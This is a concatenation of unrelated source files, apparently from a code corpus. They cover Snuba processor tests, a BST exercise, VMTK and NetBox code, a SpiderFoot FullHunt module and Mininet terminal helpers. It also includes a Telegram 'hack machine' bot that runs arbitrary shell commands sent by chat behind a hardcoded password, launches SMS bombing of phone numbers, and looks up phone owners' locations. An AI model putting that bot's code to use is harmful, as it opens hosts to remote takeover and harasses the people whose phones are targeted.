enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_v2_end_delete_groups(self): project_id = 1 message = (2, 'end_delete_groups', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_v2_start_merge(self): project_id = 1 message = (2, 'start_merge', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)]) def test_v2_end_merge(self): project_id = 1 message = (2, 'end_merge', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_v2_start_unmerge(self): project_id = 1 message = (2, 'start_unmerge', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_v2_end_unmerge(self): project_id = 1 message = (2, 'end_unmerge', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_v2_start_delete_tag(self): project_id = 1 message = (2, 'start_delete_tag', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_v2_end_delete_tag(self): project_id = 1 message = (2, 'end_delete_tag', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_extract_sdk(self): sdk = { 'integrations': ['logback'], 'name': 'sentry-java', 'version': '1.6.1-d1e3a' } output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_sdk(output, sdk) assert output == { 'sdk_name': u'sentry-java', 'sdk_version': u'1.6.1-d1e3a', 'sdk_integrations': [u'logback'], } def test_extract_tags(self): orig_tags = { 'sentry:user': 'the_user', 'level': 'the_level', 'logger': 'the_logger', 'server_name': 'the_servername', 'transaction': 'the_transaction', 'environment': 'the_enviroment', 'sentry:release': 'the_release', 'sentry:dist': 'the_dist', 'site': 'the_site', 'url': 'the_url', 'extra_tag': 'extra_value', 'null_tag': None, } tags = orig_tags.copy() output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_promoted_tags(output, tags) assert output == { 'sentry:dist': 'the_dist', 'environment': u'the_enviroment', 'level': u'the_level', 'logger': u'the_logger', 'sentry:release': 'the_release', 'server_name': u'the_servername', 'site': u'the_site', 'transaction': u'the_transaction', 'url': u'the_url', 'sentry:user': u'the_user', } assert tags == orig_tags extra_output = {} extract_extra_tags(extra_output, tags) valid_items = [(k, v) for k, v in sorted(orig_tags.items()) if v] assert extra_output == { 'tags.key': [k for k, v in valid_items], 'tags.value': [v for k, v in valid_items] } def test_extract_tags_empty_string(self): # verify our text field extraction doesn't coerce '' to None tags = { 'environment': '', } output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_promoted_tags(output, tags) assert output['environment'] == u'' def test_extract_contexts(self): contexts = { 'app': { 'device_app_hash': 'the_app_device_uuid', }, 'os': { 'name': 'the_os_name', 'version': 'the_os_version', 'rooted': True, 'build': 'the_os_build', 'kernel_version': 'the_os_kernel_version', }, 'runtime': { 'name': 'the_runtime_name', 'version': 'the_runtime_version', }, 'browser': { 'name': 'the_browser_name', 'version': 'the_browser_version', }, 'device': { 'model': 'the_device_model', 'family': 'the_device_family', 'name': 'the_device_name', 'brand': 'the_device_brand', 'locale': 'the_device_locale', 'uuid': 'the_device_uuid', 'model_id': 'the_device_model_id', 'arch': 'the_device_arch', 'battery_level': 30, 'orientation': 'the_device_orientation', 'simulator': False, 'online': True, 'charging': True, }, 'extra': { 'type': 'extra', # unnecessary 'null': None, 'int': 0, 'float': 1.3, 'list': [1, 2, 3], 'dict': {'key': 'value'}, 'str': 'string', } } orig_tags = { 'app.device': 'the_app_device_uuid', 'os': 'the_os_name the_os_version', 'os.name': 'the_os_name', 'os.rooted': True, 'runtime': 'the_runtime_name the_runtime_version', 'runtime.name': 'the_runtime_name', 'browser': 'the_browser_name the_browser_version', 'browser.name': 'the_browser_name', 'device': 'the_device_model', 'device.family': 'the_device_family', 'extra_tag': 'extra_value', } tags = orig_tags.copy() output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_promoted_contexts(output, contexts, tags) assert output == { 'app_device': u'the_app_device_uuid', 'browser': u'the_browser_name the_browser_version', 'browser_name': u'the_browser_name', 'device': u'the_device_model', 'device_arch': u'the_device_arch', 'device_battery_level': 30.0, 'device_brand': u'the_device_brand', 'device_charging': True, 'device_family': u'the_device_family', 'device_locale': u'the_device_locale', 'device_model_id': u'the_device_model_id', 'device_name': u'the_device_name', 'device_online': True, 'device_orientation': u'the_device_orientation', 'device_simulator': False, 'device_uuid': u'the_device_uuid', 'os': u'the_os_name the_os_version', 'os_build': u'the_os_build', 'os_kernel_version': u'the_os_kernel_version', 'os_name': u'the_os_name', 'os_rooted': True, 'runtime': u'the_runtime_name the_runtime_version', 'runtime_name': u'the_runtime_name', } assert contexts == { 'app': {}, 'browser': {}, 'device': {}, 'extra': { 'dict': {'key': 'value'}, 'float': 1.3, 'int': 0, 'list': [1, 2, 3], 'null': None, 'type': 'extra', 'str': 'string', }, 'os': {}, 'runtime': {}, } assert tags == orig_tags extra_output = {} extract_extra_contexts(extra_output, contexts) assert extra_output == { 'contexts.key': ['extra.int', 'extra.float', 'extra.str'], 'contexts.value': [u'0', u'1.3', u'string'], } def test_extract_user(self): user = { 'id': 'user_id', 'email': 'user_email', 'username': 'user_username', 'ip_address': '127.0.0.2', } output = {} extract_user(output, user) assert output == {'email': u'user_email', 'ip_address': u'127.0.0.2', 'user_id': u'user_id', 'username': u'user_username'} def test_extract_geo(self): geo = { 'country_code': 'US', 'city': 'San Francisco', 'region': 'CA', } output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_geo(output, geo) assert output == { 'geo_country_code': 'US', 'geo_city': 'San Francisco', 'geo_region': 'CA', } def test_extract_http(self): http = { 'method': 'GET', 'headers': [ ['Referer', 'https://sentry.io'], ['Host', 'https://google.com'], ] } output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_http(output, http) assert output == {'http_method': u'GET', 'http_referer': u'https://sentry.io'} def test_extract_stacktraces(self): stacks = [ {'module': 'java.lang', 'mechanism': { 'type': 'promise', 'description': 'globally unhandled promise rejection', 'help_link': 'http://example.com', 'handled': False, 'data': { 'polyfill': 'Bluebird' }, 'meta': { 'errno': { 'number': 123112, 'name': '' } } }, 'stacktrace': { 'frames': [ {'abs_path': 'Thread.java', 'filename': 'Thread.java', 'function': 'run', 'in_app': False, 'lineno': 748, 'module': 'java.lang.Thread'}, {'abs_path': 'ExecJavaMojo.java', 'filename': 'ExecJavaMojo.java', 'function': 'run', 'in_app': False, 'lineno': 293, 'module': 'org.codehaus.mojo.exec.ExecJavaMojo$1'}, {'abs_path': 'Method.java', 'filename': 'Method.java', 'function': 'invoke', 'in_app': False, 'colno': 19, 'lineno': 498, 'module': 'java.lang.reflect.Method'}, {'abs_path': 'DelegatingMethodAccessorImpl.java', 'filename': 'DelegatingMethodAccessorImpl.java', 'function': 'invoke', 'in_app': False, 'package': 'foo.bar', 'lineno': 43, 'module': 'sun.reflect.DelegatingMethodAccessorImpl'}, {'abs_path': 'NativeMethodAccessorImpl.java', 'filename': 'NativeMethodAccessorImpl.java', 'function': 'invoke', 'in_app': False, 'lineno': 62, 'module': 'sun.reflect.NativeMethodAccessorImpl'}, {'abs_path': 'NativeMethodAccessorImpl.java', 'filename': 'NativeMethodAccessorImpl.java', 'function': 'invoke0', 'in_app': False, 'module': 'sun.reflect.NativeMethodAccessorImpl'}, {'abs_path': 'Application.java', 'filename': 'Application.java', 'function': 'main', 'in_app': True, 'lineno': 17, 'module': 'io.sentry.example.Application'}]}, 'type': 'ArithmeticException', 'value': '/ by zero'}] output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_stacktraces(output, stacks) assert output == { 'exception_frames.abs_path': [u'Thread.java', u'ExecJavaMojo.java', u'Method.java', u'DelegatingMethodAccessorImpl.java', u'NativeMethodAccessorImpl.java', u'NativeMethodAccessorImpl.java', u'Application.java'], 'exception_frames.colno': [None, None, 19, None, None, None, None], 'exception_frames.filename': [u'Thread.java', u'ExecJavaMojo.java', u'Method.java', u'DelegatingMethodAccessorImpl.java', u'NativeMethodAccessorImpl.java', u'NativeMethodAccessorImpl.java', u'Application.java'], 'exception_frames.function': [u'run', u'run', u'invoke', u'invoke', u'invoke', u'invoke0', u'main'], 'exception_frames.in_app': [False, False, False, False, False, False, True], 'exception_frames.lineno': [748, 293, 498, 43, 62, None, 17], 'exception_frames.module': [u'java.lang.Thread', u'org.codehaus.mojo.exec.ExecJavaMojo$1', u'java.lang.reflect.Method', u'sun.reflect.DelegatingMethodAccessorImpl', u'sun.reflect.NativeMethodAccessorImpl', u'sun.reflect.NativeMethodAccessorImpl', u'io.sentry.example.Application'], 'exception_frames.package': [None, None, None, u'foo.bar', None, None, None], 'exception_frames.stack_level': [0, 0, 0, 0, 0, 0, 0], 'exception_stacks.type': [u'ArithmeticException'], 'exception_stacks.value': [u'/ by zero'], 'exception_stacks.mechanism_handled': [False], 'exception_stacks.mechanism_type': [u'promise'], } def test_null_values_dont_throw(self): event = { 'event_id': 'bce76c2473324fa387b33564eacf34a0', 'group_id': 1, 'primary_hash': 'a' * 32, 'project_id': 70156, 'message': None, 'platform': None, 'data': { 'culprit': None, 'errors': None, 'extra': None, 'fingerprint': None, 'http': None, 'id': 'bce76c2473324fa387b33564eacf34a0', 'message': None, 'metadata': None, 'platform': None, 'project': 70156, 'release': None, 'dist': None, 'sdk': None, 'sentry.interfaces.Exception': { 'exc_omitted': None, 'values': None }, 'sentry.interfaces.Message': None, 'tags': None, 'time_spent': None, 'type': None, 'version': None } } timestamp = datetime.utcnow() event['datetime'] = (timestamp - timedelta(seconds=2)).strftime("%Y-%m-%dT%H:%M:%S.%fZ") event['data']['received'] = int(calendar.timegm((timestamp - timedelta(seconds=1)).timetuple())) enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_insert(event)
the-stack_106_24266
import sys class Node: def __init__(self, data): self.right=self.left=None self.data = data class Solution: def insert(self, root, data): if root == None: return Node(data) else: if data<=root.data: cur=self.insert(root.left,data) root.left=cur else: cur=self.insert(root.right,data) root.right=cur return root def levelOrder(self, root): # Write your code here nodes_to_search = list() nodes_to_search.append(root) nodes_searched = '' while len(nodes_to_search) > 0: node = nodes_to_search.pop(0) if node.left: nodes_to_search.append(node.left) if node.right: nodes_to_search.append(node.right) nodes_searched += str(node.data) + ' ' print(nodes_searched) T = int(input()) myTree = Solution() root = None for i in range(T): data = int(input()) root = myTree.insert(root, data) myTree.levelOrder(root)
the-stack_106_24269
## Program: VMTK ## Language: Python ## Date: May 2, 2018 ## Version: 1.4 ## Copyright (c) Richard Izzo, Luca Antiga, All rights reserved. ## See LICENSE file for details. ## This software is distributed WITHOUT ANY WARRANTY; without even ## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR ## PURPOSE. See the above copyright notices for more information. ## Note: this code was contributed by ## Richard Izzo (Github @rlizzo) ## University at Buffalo import pytest import vmtk.vmtkcenterlineimage as centerlineimage import sys @pytest.fixture(scope='module') def per_system_compare_image_name(): name = __name__ + '_test_default_parameters_' if sys.platform in ['win32', 'win64', 'cygwin']: name = name + 'windows.vti' elif sys.platform == 'darwin': name = name + 'mac.vti' else: name = name + 'linux.vti' return name def test_default_parameters(aorta_surface, compare_images, per_system_compare_image_name): centImage = centerlineimage.vmtkCenterlineImage() centImage.Surface = aorta_surface centImage.Execute() assert compare_images(centImage.Image, per_system_compare_image_name) == True
the-stack_106_24270
# -*- coding: utf-8 -*- """ This file is covered by the LICENSING file in the root of this project. """ import sys sys.path.append("..") from functools import wraps from werkzeug.exceptions import BadRequest, InternalServerError from dateutil import parser from flask_restful import Resource from flask import request import validictory from hackathon.views.api_schema import schemas from hackathon import RequiredFeature, Context __all__ = ["Resource", "HackathonResource"] log = RequiredFeature("log") def get_input_schema(class_name, method_name): return __get_schema(class_name, method_name, "input") def get_output_schema(class_name, method_name): return __get_schema(class_name, method_name, "output") def __get_schema(class_name, method_name, t): if class_name in schemas: cls = schemas[class_name] if method_name in cls: return cls[method_name].get(t) return None def validate_date(validator, fieldname, value, format_option): if format_option == "hack_date": try: parser.parse(value) except Exception as e: raise validictory.FieldValidationError( "Could not parse date from string %s, reason: %s" % (value, e), fieldname, value) else: raise validictory.FieldValidationError("Invalid format option for \ 'validate_uuid': %(format)s" % format_option, fieldname, value) def validate(func): """A decorator for RestFul APIs that enables parameter validation""" @wraps(func) def wrapper(*args, **kwargs): class_name = func.__self__.__class__.__name__ method_name = func.__name__.lower() if hasattr(func, "original"): method_name = func.original input_schema = get_input_schema(class_name, method_name) output_schema = get_output_schema(class_name, method_name) if input_schema: if method_name in ["post", "put"] and not request.path == "/api/user/file": data = request.get_json(force=True) else: data = request.args try: formatdict = { "hack_date": validate_date } validictory.validate(data, input_schema, format_validators=formatdict, fail_fast=False) log.debug("input validated for %s.%s" % (class_name, method_name)) except validictory.MultipleValidationError as me: log.debug("input validation of '%s.%s' failed: %s" % (class_name, method_name, repr(me.errors))) raise BadRequest(repr(me.errors)) output_data = func(*args, **kwargs) if output_schema: # if it's kind of `error` defined in hackathon_response.py, skip the validation if isinstance(output_data, dict) and "error" in output_data: return output_data try: validictory.validate(output_data, output_schema, fail_fast=False) log.debug("output validated for %s.%s" % (class_name, method_name)) except validictory.MultipleValidationError as me: log.debug("output validation of '%s.%s' failed: %s" % (class_name, method_name, repr(me.errors))) raise InternalServerError(repr(me.errors)) code = "200" if output_data is not None and isinstance(output_data, dict) and "error" in output_data: code = output_data["error"]["code"] log.debug("API call %s.%s -- %s %d" % (class_name, method_name, code, len(str(output_data)))) return output_data return wrapper class HackathonResource(Resource): """Inheritance of Resource which provides custom input/output validation""" method_decorators = [validate] def context(self): """Convert input to Context By default, convert json body to Convext for put/post request, convert args for get/delete request :rtype: Context :return Context object from request body or query """ caller = sys._getframe().f_back.f_code.co_name.lower() if caller in ["post", "put"] and not request.path == "/api/user/file": return Context.from_object(request.get_json(force=True)) else: return Context.from_object(request.args)
the-stack_106_24271
import telegram from telegram.ext import Updater,CommandHandler,MessageHandler, Filters import logging import subprocess as sp import requests import json import threading from bomber import kill import shodan import speech_recognition as sr from pydub import AudioSegment import re enabled_users=[] ippsec_list=[] # api required bot=telegram.Bot("<token>") updater = Updater(token='<token>') dispatcher = updater.dispatcher logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',level=logging.INFO) SHODAN_API_KEY = "<token>" api = shodan.Shodan(SHODAN_API_KEY) def banner(): c="==========================" c+="\nWelcome To personal Hack Machine" c+="\n To start Login:- /verify <password>" c+="\n========================" return (c) def sender(update,text): bot.send_message(chat_id=update.message.chat_id, text=text) def banned(update): bot.send_message(chat_id=update.message.chat_id,text="Login First !!") def start(bot, update): bot.send_message(chat_id=update.message.chat_id, text=banner()) start_handler = CommandHandler('start', start) dispatcher.add_handler(start_handler) def verify(bot,update,args): if args: if args[0]=="haha@123": sender(update,"Successfully logged in") enabled_users.append(update.message.from_user.id) else: banned(update) verify_handler = CommandHandler('verify', verify,pass_args=True) dispatcher.add_handler(verify_handler) def echo(bot, update): sender(update,"Use /help For more :)") echo_handler = MessageHandler(Filters.text, echo) dispatcher.add_handler(echo_handler) def voice_handler(bot, update): r = sr.Recognizer() file = bot.getFile(update.message.voice.file_id) sender(update,"Processing the command") file.download('voice.ogg') ogg_version = AudioSegment.from_ogg("voice.ogg") ogg_version.export("voice.wav", format="wav") harvard = sr.AudioFile('voice.wav') with harvard as source: audio = r.record(source) analyser(bot,update,r.recognize_google(audio)) echoaudio_handler = MessageHandler(Filters.voice, voice_handler) dispatcher.add_handler(echoaudio_handler) def exit(bot, update): sender(update,"Logged out Successfully") enabled_users.remove(update.message.from_user.id) exit_handler = CommandHandler('exit', exit) dispatcher.add_handler(exit_handler) def cmd2(bot,update,args): if update.message.from_user.id in enabled_users: if args: output = sp.getoutput(args) sender(update,output) else: sender(update,"Enter a command dumbass !!") else: banned(update) def ippsec(bot,update,args): if update.message.from_user.id in enabled_users: target=args[0] temp=['empty life'] global ippsec_list if ippsec_list: count=0 sender(update,"Keyword: {}".format(target)) for i in ippsec_list: count+=1 i=i.lower() if i.find(target)>=0: location=count-1 flag=0 while flag==0: s=ippsec_list[location] if s.find("HackTheBox")==0: if ippsec_list[location+1] in temp: flag=1 else: temp.append(ippsec_list[location+1]) output="Machine: {}\nLink: {}".format(s,ippsec_list[location+1]) sender(update,output) flag=1 else: location=location-1 else: url="https://gist.githubusercontent.com/sminez/571bd7bafb1b88630b85c85a0cd66e3a/raw/68fe21504be4654b739a577a482d91587524f683/ippsec-details.txt" r=requests.get(url) ippsec_list=r.text.split('\n') ippsec(bot,update,args) else: banned(update) def ippsec_start(bot,update,args): commands="" lists=[] for i in range(len(args)): commands+=args[i] commands+=" " commands.split() lists.append(commands) print(lists) ippsec(bot,update,lists) help_handler = CommandHandler('youtube', ippsec_start,pass_args=True) dispatcher.add_handler(help_handler) def analyser(bot,update,commands): commands=commands.lower() if re.match("cmd",commands): commands=commands.replace("cmd","") cmd2(bot,update,commands) elif re.match("shodan",commands): commands=commands.replace("shodan","") text = commands.split(' ') text.remove('') shodansearch(bot,update,text) elif re.match("sms",commands): commands=commands.replace("sms","").replace(" ","") text = commands.split(' ') sender(update,"Target: {}".format(text[0])) bomb(bot,update,text) elif re.match("verify",commands): commands=commands.replace("verify","").replace(" ","") text = commands.split(' ') sender(update,"Password Entered: {}".format(text[0])) verify(bot,update,text) elif re.match("help",commands): help(bot,update) elif re.match("exit",commands): exit(bot,update) elif re.match("youtube",commands): text=[] commands=commands.replace("youtube","") text.append(commands) ippsec(bot,update,text) else: sender(update,"Process failed try again :(\nraw output: {}".format(commands)) def help(bot,update): sender(update,"- /verify <password>\n- /cmd <command>\n- /exit\n- /track <phone-number-with-country-prefix>\n- /bomber <indian-phone-number-without-country-code\n- /shodan <For instructions>\n- /voice <For instructions>\n- /youtube <keyword-to-search-in-ippsec-videos>") help_handler = CommandHandler('help', help) dispatcher.add_handler(help_handler) def voice_help(bot,update): sender(update,"[Below commands should be spoken clearly and you can only use voice command and control from personal chat with bot and by replying to bot in group chats]\n\n[To start chat with bot click here:- \n\nhttps://telegram.me/callmedaddbot ]\n- help\n- verify <password>\n- sms <number to bomb>\n- shodan find/ip <ip/http/ftp/service>\n- cmd <command-to-execute>\n- youtube <keyword-to-search-in-ippsec-videos>\n- exit ") voicehelp_handler = CommandHandler('voice', voice_help) dispatcher.add_handler(voicehelp_handler) def cmd(bot,update,args): if update.message.from_user.id in enabled_users: if args: command="" for i in range(len(args)): command+=args[i] command+=" " output = sp.getoutput(command) sender(update,output) else: sender(update,"Enter a command dumbass !!") else: banned(update) caps_handler = CommandHandler('cmd', cmd, pass_args=True) dispatcher.add_handler(caps_handler) def callsearch(bot,update,args): if update.message.from_user.id in enabled_users: if args: args=args[0].replace("+","") r=requests.get("http://apilayer.net/api/validate?access_key=<token>&number={}&country_code=&format=1".format(args)) data=json.loads(r.text) sendback="Phone Number:-{}\nCountry Prefix:-{}\nLocation:-{}\nCountry:-{}\nCarrier:-{}".format(data['international_format'],data['country_prefix'],data['location'],data['country_name'],data['carrier']) sender(update,sendback) else: banned(update) call_handler = CommandHandler('track', callsearch, pass_args=True) dispatcher.add_handler(call_handler) def bomb(bot,update,args): if update.message.from_user.id in enabled_users: if args: num=args[0].replace("+91","") threading.Thread(target=kill,args=(num,)).start() sender(update,"Hiroshima is Done for, sire :)") else: sender(update,"/bomber <indian-phone-number-without-country-code") else: banned(update) bomb_handler = CommandHandler('bomber', bomb, pass_args=True) dispatcher.add_handler(bomb_handler) def shodansearch(bot,update,args): if update.message.from_user.id in enabled_users: if args: if len(args)<=2: if args[0]=="ip": try: a=api.host('{}'.format(args[1])) ports=str(a['ports']).replace("[","").replace("]","") a="ip:{}\nports opened:{}\nCity:{}\ncountry code:{}\nISP:{}\nlongitude:{}\nlatitude:{}".format(a['ip_str'],ports,a['data'][0]['location']['city'],a['data'][0]['location']['country_code3'],a['isp'],a['longitude'],a['latitude']) sender(update,a) except: sender(update,"No information available on this ip") if args[0]=="find": query=str(args[1]) a=api.search(query,page=1,limit=3) for i in a['matches']: s="\norganistaion {}\nISP: {}\nIP: {}\n".format(i['org'],i['isp'],i['ip_str']) sender(update,s) elif len(args)>2: if args[0]=="find" and args[1]=="limit": limits=int(args[2]) if limits<=10: query=str(args[3]) a=api.search(query,page=1,limit=limits) for i in a['matches']: s="\norganistaion {}\nISP: {}\nIP: {}\n".format(i['org'],i['isp'],i['ip_str']) sender(update,s) else: sender(update,"Limit Crossed") else: a="- /shodan ip <ipaddress>\n- /shodan find <http/ssh/ftp/port/city/software> [MAX LIMIT 3]\n- /shodan find limit <enter b/w 1 to 10> <http/ssh/ftp/port/city/software> [MAX LIMIT 10]" sender(update,a) else: banned(update) shodan_handler = CommandHandler('shodan', shodansearch, pass_args=True) dispatcher.add_handler(shodan_handler) updater.start_polling()
the-stack_106_24272
""" Terminal creation and cleanup. Utility functions to run a terminal (connected via socat(1)) on each host. Requires socat(1) and xterm(1). Optionally uses gnome-terminal. """ from os import environ from mininet.log import error from mininet.util import quietRun, errRun def tunnelX11( node, display=None): """Create an X11 tunnel from node:6000 to the root host display: display on root host (optional) returns: node $DISPLAY, Popen object for tunnel""" if display is None and 'DISPLAY' in environ: display = environ[ 'DISPLAY' ] if display is None: error( "Error: Cannot connect to display\n" ) return None, None host, screen = display.split( ':' ) # Unix sockets should work if not host or host == 'unix': # GDM3 doesn't put credentials in .Xauthority, # so allow root to just connect quietRun( 'xhost +si:localuser:root' ) return display, None else: # Create a tunnel for the TCP connection port = 6000 + int( float( screen ) ) connection = r'TCP\:%s\:%s' % ( host, port ) cmd = [ "socat", "TCP-LISTEN:%d,fork,reuseaddr" % port, "EXEC:'mnexec -a 1 socat STDIO %s'" % connection ] return 'localhost:' + screen, node.popen( cmd ) def makeTerm( node, title='Node', term='xterm', display=None, cmd='bash'): """Create an X11 tunnel to the node and start up a terminal. node: Node object title: base title term: 'xterm' or 'gterm' returns: two Popen objects, tunnel and terminal""" title = '"%s: %s"' % ( title, node.name ) if not node.inNamespace: title += ' (root)' cmds = { 'xterm': [ 'xterm', '-title', title, '-display' ], 'gterm': [ 'gnome-terminal', '--title', title, '--display' ] } if term not in cmds: error( 'invalid terminal type: %s' % term ) return display, tunnel = tunnelX11( node, display ) if display is None: return [] term = node.popen( cmds[ term ] + [ display, '-e', 'env TERM=ansi %s' % cmd ] ) return [ tunnel, term ] if tunnel else [ term ] def runX11( node, cmd ): "Run an X11 client on a node" _display, tunnel = tunnelX11( node ) if _display is None: return [] popen = node.popen( cmd ) return [ tunnel, popen ] def cleanUpScreens(): "Remove moldy socat X11 tunnels." errRun( "pkill -9 -f mnexec.*socat" ) def makeTerms( nodes, title='Node', term='xterm' ): """Create terminals. nodes: list of Node objects title: base title for each returns: list of created tunnel/terminal processes""" terms = [] for node in nodes: terms += makeTerm( node, title, term ) return terms
the-stack_106_24273
# -*- coding: utf-8 -*- # ------------------------------------------------------------------------------- # Name: sfp_fullhunt # Purpose: Identify domain attack surface using FullHunt API. # # Author: <[email protected]> # # Created: 2021-10-26 # Copyright: (c) bcoles 2021 # Licence: MIT # ------------------------------------------------------------------------------- import json from spiderfoot import SpiderFootEvent, SpiderFootPlugin class sfp_fullhunt(SpiderFootPlugin): meta = { 'name': "FullHunt", 'summary': "Identify domain attack surface using FullHunt API.", 'flags': ['apikey'], 'useCases': ["Passive", "Footprint", "Investigate"], 'categories': ["Search Engines"], 'dataSource': { 'website': "https://fullhunt.io/", 'model': "FREE_AUTH_LIMITED", 'references': [ "https://api-docs.fullhunt.io/", ], 'apiKeyInstructions': [ "Visit https://fullhunt.io/", "Register a free account", "Navigate to https://fullhunt.io/user/settings/", "Your API key is listed under 'API Access'" ], 'favIcon': "https://fullhunt.io/static/theme/images/logo/favicon.ico", 'logo': "https://fullhunt.io/static/theme/images/logo/Icon.png", 'description': "Discover, monitor, and secure your attack surface. " "FullHunt delivers the best platform in the market for attack surface security." } } opts = { "api_key": "", } optdescs = { "api_key": "FullHunt API key.", } results = None errorState = False def setup(self, sfc, userOpts=dict()): self.sf = sfc self.errorState = False self.results = self.tempStorage() for opt in list(userOpts.keys()): self.opts[opt] = userOpts[opt] def watchedEvents(self): return [ "DOMAIN_NAME", ] def producedEvents(self): return [ "INTERNET_NAME", "INTERNET_NAME_UNRESOLVED", "AFFILIATE_INTERNET_NAME", "AFFILIATE_INTERNET_NAME_UNRESOLVED", "TCP_PORT_OPEN", "PROVIDER_DNS", "PROVIDER_MAIL", ] def queryDomainDetails(self, qry): """Search for hosts on a domain. Args: qry (str): domain name Returns: dict: search results """ headers = { 'X-API-KEY': self.opts['api_key'] } res = self.sf.fetchUrl( f"https://fullhunt.io/api/v1/domain/{qry}/details", timeout=30, headers=headers, useragent=self.opts['_useragent'] ) return self.parseApiResponse(res) def parseApiResponse(self, res: dict): if not res: self.error("No response from FullHunt.") return None if res['code'] == "400": self.error("Bad Request -- Your request is invalid.") return None if res['code'] == "401": self.errorState = True self.error("Unauthorized -- Your API key is wrong.") return None if res['code'] == "403": self.errorState = True self.error("Forbidden -- The requested resource is forbidden.") return None if res['code'] == "404": self.error("Not Found -- The requested resource could not be found.") return None if res['code'] == "429": self.errorState = True self.error("Too Many Requests -- You are sending too many requests.") return None try: results = json.loads(res['content']) except Exception as e: self.debug(f"Error processing JSON response: {e}") return None return results.get('hosts') def handleEvent(self, event): eventName = event.eventType eventData = event.data if self.errorState: return self.debug(f"Received event, {eventName}, from {event.module}") if self.opts["api_key"] == "": self.error( f"You enabled {self.__class__.__name__} but did not set an API key!" ) self.errorState = True return if eventData in self.results: self.debug(f"Skipping {eventData}, already checked.") return self.results[eventData] = True res = self.queryDomainDetails(eventData) if not res: self.debug(f"Found no results for {eventData}") return e = SpiderFootEvent("RAW_RIR_DATA", str(res), self.__name__, event) self.notifyListeners(e) hosts = list() name_servers = list() mail_servers = list() for record in res: host = record.get('host') if not host: continue hosts.append(host) dns = record.get('dns') if dns: mx = dns.get('mx') if mx: for mail_server in mx: mail_servers.append(mail_server.rstrip(".")) ns = dns.get('ns') if ns: for name_server in ns: name_servers.append(name_server.rstrip(".")) cname = dns.get('cname') if cname: for c in cname: hosts.append(c.rstrip(".")) network_ports = record.get('network_ports') if network_ports: for port in network_ports: e = SpiderFootEvent("TCP_PORT_OPEN", f"{host}:{port}", self.__name__, event) self.notifyListeners(e) for host in set(mail_servers): if not host: continue hosts.append(host) e = SpiderFootEvent("PROVIDER_MAIL", host, self.__name__, event) self.notifyListeners(e) for host in set(name_servers): if not host: continue hosts.append(host) e = SpiderFootEvent("PROVIDER_DNS", host, self.__name__, event) self.notifyListeners(e) for host in set(hosts): if not host: continue if host in self.results: continue self.results[host] = True if self.getTarget().matches(host, includeChildren=True): evt_type = "INTERNET_NAME" else: evt_type = "AFFILIATE_INTERNET_NAME" if not self.sf.resolveHost(host) and not self.sf.resolveHost6(host): self.debug(f"Host {host} could not be resolved") evt_type += "_UNRESOLVED" evt = SpiderFootEvent(evt_type, host, self.__name__, event) self.notifyListeners(evt) # End of sfp_fullhunt class
the-stack_106_24275
"""Plugin declaration for netbox_onboarding. (c) 2020 Network To Code Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ __version__ = "2.2.1b2" from extras.plugins import PluginConfig class OnboardingConfig(PluginConfig): """Plugin configuration for the netbox_onboarding plugin.""" name = "netbox_onboarding" verbose_name = "Device Onboarding" version = __version__ author = "Network to Code" description = "A plugin for NetBox to easily onboard new devices." base_url = "onboarding" required_settings = [] min_version = "2.8.1" max_version = "3.1.99" default_settings = { "create_platform_if_missing": True, "create_manufacturer_if_missing": True, "create_device_type_if_missing": True, "create_device_role_if_missing": True, "default_device_role": "network", "default_device_role_color": "FF0000", "default_management_interface": "PLACEHOLDER", "default_management_prefix_length": 0, "default_device_status": "active", "create_management_interface_if_missing": True, "skip_device_type_on_update": False, "skip_manufacturer_on_update": False, "platform_map": {}, "onboarding_extensions_map": {"ios": "netbox_onboarding.onboarding_extensions.ios",}, "object_match_strategy": "loose", } caching_config = {} config = OnboardingConfig # pylint:disable=invalid-name
the-stack_106_24276
import json import webob class Response: def __init__(self): self.json = None self.html = None self.text = None self.content_type = None self.status_code = 200 def __call__(self, environ, start_response): self.set_body_and_content_type() resp = webob.Response( body=self.body, content_type=self.content_type, status=self.status_code, ) return resp(environ, start_response) def set_body_and_content_type(self): if self.json: self.body = json.dumps(self.json).encode() self.content_type = "application/json" if self.html: self.body = self.html.encode() self.content_type = "text/html" if self.text: self.body = self.text self.content_type = "text/plain"
